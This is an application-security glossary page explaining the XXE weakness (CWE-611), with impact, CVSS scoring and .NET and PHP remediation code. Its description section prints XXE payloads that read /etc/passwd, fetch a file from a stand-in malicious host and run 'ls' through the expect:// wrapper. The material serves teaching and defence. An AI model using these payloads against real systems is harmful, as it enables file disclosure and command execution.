CWE Glossary

CWE is a trademark of the MITRE Corporation.

Stay in touch

Application security insights and invitations to exclusive events in your inbox


Your data will stay confidential Private and Confidential

Improper Restriction of XML External Entity Reference ('XXE') [CWE-611]

The weakness describes the case where XML parser is not correctly configured and allows the attacker to directly interact with local or external files.

Created: June 11, 2018

Table of Content

  1. Description
  2. Potential impact
  3. Attack patterns
  4. Affected software
  5. Severity and CVSS Scoring
  6. Mitigations
  7. Vulnerability Remediation Techniques and Examples
  8. References

1. Description

The weakness is caused by an error while parsing an XML file that contains XML entities with URIs that can resolve to documents outside the intended location. If the application fails to check path to documents before including them, the attacker is able to include arbitrary file from local or remote system and trigger the application to display it.

The XXE attack is constructed around XML language capabilities to define arbitrary entities using the external Data Type Definition (DTD) and the ability to read or execute files.

Below is an example of XML file that when processed may return output of local “/etc/passwd” file:

  1. <?xml version="1.0" encoding="ISO-8859-1"?>
  2. <!DOCTYPE test [
  3.     <!ELEMENT test ANY >
  4.     <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

Another example shows how to request an external resource using the same vulnerability:

  1. <?xml version="1.0" encoding="ISO-8859-1"?>
  2. <!DOCTYPE test [
  3.     <!ELEMENT test ANY >
  4.     <!ENTITY xxe SYSTEM "http://www.malicious-website.com/xxe.txt >]>

The attacker can also be able to execute arbitrary commands on the system by leveraging third-party software, e.g. “expect” PHP module. The PoC code below will list files and directories in the current application folder by running “/bin/ls” command:

  1. <?xml version="1.0" encoding="ISO-8859-1"?>
  2. <!DOCTYPE test [ <!ELEMENT test ANY >
  3.     <!ENTITY xxe SYSTEM "expect://ls" >]>

2. Potential impact

XXE is a very dangerous vulnerability. Depending on application implementation and the application environment the impact may vary from local / remote file inclusion to remote command execution and full system compromise. This vulnerability can be used also to perform port scans of the vulnerable system or servers located in the internal network.

3. Attack patterns

This vulnerability is associated with the following attack patterns:

4. Affected software

Software that processes XML files can be affected by this issue.

5. Severity and CVSS Scoring

This is extremely dangerous vulnerability. It may allow an attacker to compromise vulnerable system as is most likely scored as Critical:
9.8 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C] - Critical

6. Mitigations

This vulnerability is usually introduced to the application during the architecture and design phase. In most cases it is impossible to mitigate this vulnerability without modification of the application source code.

7. Vulnerability Remediation Techniques and Examples

To avoid exploitation of XEE vulnerability the best approach is to disable the ability to load entities from external source.

Below are several examples how to disable external entities:

.NET 3.5
  1. XmlReaderSettings settings = new XmlReaderSettings();
  2. settings.ProhibitDtd = true;
  3. XmlReader reader = XmlReader.Create(stream, settings);
.NET 4.0
  1. XmlReaderSettings settings = new XmlReaderSettings();
  2. settings.DtdProcessing = DtdProcessing.Prohibit;
  3. XmlReader reader = XmlReader.Create(stream, settings);
PHP
  1. libxml_disable_entity_loader(true);

8. References

  1. CWE-611: Improper Restriction of XML External Entity Reference ('XXE') [cwe.mitre.org]
  2. XmlReaderSettings.DtdProcessing Property [cwe.mitre.org]
  3. libxml_disable_entity_loader — Disable the ability to load external entities [php.net]

Copyright Disclaimer: Any above-mentioned content can be copied and used for non-commercial purposes only if proper credit to High-Tech Bridge is given.

↑ Back to Top
High-Tech Bridge on Facebook High-Tech Bridge on Twitter High-Tech Bridge on LinkedIn High-Tech Bridge RSS Feeds Send by Email
Share
Let's Talk